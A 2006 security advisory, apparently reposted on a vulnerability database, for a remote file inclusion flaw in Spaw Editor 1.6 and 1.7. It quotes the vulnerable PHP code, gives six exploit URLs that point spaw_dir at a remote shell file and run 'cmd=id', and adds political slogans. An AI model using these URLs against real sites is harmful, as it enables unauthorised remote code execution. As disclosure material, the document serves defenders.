Spaw Editor Remote Include Vulnerability

2006.08.25
Credit: botan
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

* Kurdish Security Advisory * Spaw Editor Remote Include Vulnerability * Our Party is PKK, Our Army HPG, We will Earn * contact ? : irc.gigachat.net #kurdhack & botan (at) linuxmail (dot) org [email concealed] * Risk : High * Class : Remote * Script : Spaw Editor * Version : v1.6 and v1.7 * Site : www.solmetra.com <? // include wysiwyg config include '../config/spaw_control.config.php'; include $spaw_root.'class/lang.class.php'; $theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme ']; $theme_path = $spaw_dir.'lib/themes/'.$theme.'/'; $l = new SPAW_Lang($HTTP_GET_VARS['lang']); $l->setBlock('colorpicker'); ?> http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd= id http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell .txt&cmd=id http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cm d=id http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell .txt?&cmd=id http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?& cmd=id http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd =id Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top